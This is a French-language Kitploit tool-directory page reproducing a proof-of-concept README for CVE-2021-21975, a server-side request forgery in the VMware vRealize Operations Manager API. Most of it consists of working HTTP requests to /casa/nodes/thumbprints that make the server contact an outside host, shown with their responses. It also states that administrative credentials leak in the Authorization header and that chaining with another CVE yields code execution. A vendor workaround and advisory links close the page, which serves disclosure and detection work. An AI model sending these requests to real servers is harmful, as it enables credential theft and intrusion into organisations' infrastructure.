Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/murataydemir/cve-2021-21975
ReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebSécurité Cloud
GitHubmurataydemir/cve-2021-21975

CVE-2021-21975

[CVE-2021-21975] Falsification de requête côté serveur (SSRF) de l'API Server de VMware vRealize Operations Manager

Voir le dépôt
432il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

[CVE-2021-21975] VMware vRealize Operations Manager API Falsification de requête côté serveur (SSRF)


vRealize Operations (vROps) est un outil de gestion des opérations IT autonome piloté par l'IA, des applications à l'infrastructure, pour optimiser, planifier et étendre les déploiements VMware Cloud et HCI tout en unifiant la surveillance du cloud public. L'API VMware vRealize Operations Manager 8.4 et toutes les versions précédentes est vulnérable à une falsification de requête côté serveur (SSRF). L'exploitation réussie de cette vulnérabilité peut permettre de lire ou de mettre à jour des ressources internes et, dans ce cas, un attaquant peut facilement voler les identifiants administratifs du serveur vROps. En combinant CVE-2021-21975 et CVE-2021-21983, un attaquant peut exécuter du code arbitraire sur le serveur vRealize Operations distant.

Preuve de concept (PoC) : Pour exploiter cette vulnérabilité, vous pouvez utiliser la requête suivante

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]

La réponse à la requête ci-dessus est ci-dessous

root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]
Capture d'écran 2021-04-03 à 01:03:29 Capture d'écran 2021-04-03 à 01:18:07

De plus, les identifiants administratifs sont divulgués dans l'en-tête Authorization.

Capture d'écran 2021-04-03 à 01:19:39 Capture d'écran 2021-04-03 à 01:24:34

Autres preuves de concept (PoC) : Ou vous pouvez utiliser les requêtes suivantes pour détecter la vulnérabilité CVE-2021-21975 VMware vRealize Operations Manager API Falsification de requête côté serveur (SSRF)

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]
Capture d'écran 2021-04-03 à 00:00:20
root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
Capture d'écran 2021-04-03 à 00:01:00

Solution de contournement : Si le correctif ne peut pas être installé, ou s'il n'y a pas de correctif pour votre version de vRealize Operations, les étapes suivantes peuvent être suivies pour contourner le problème. L'application de ce contournement n'a aucun impact sur vRealize Operations.

Pour contourner ce problème dans vRealize Operations, supprimez une ligne de configuration de casa-security-context.xml

  1. Connectez-vous au nœud principal en tant que root via SSH ou Console, en appuyant sur ALT+F1 dans une console pour vous connecter
  2. Ouvrez /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml
  3. Trouvez et supprimez la ligne : <sec:http pattern="/nodes/thumbprints" security='none'/>
  4. Enregistrez et fermez le fichier
  5. Redémarrez le service CaSA avec cette commande : service vmware-casa restart
  6. Répétez les étapes 1 à 5 sur tous les autres nœuds du cluster vRealize Operations.

Pour plus d'informations, visitez les pages suivantes.

https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html

Télécharger l’outil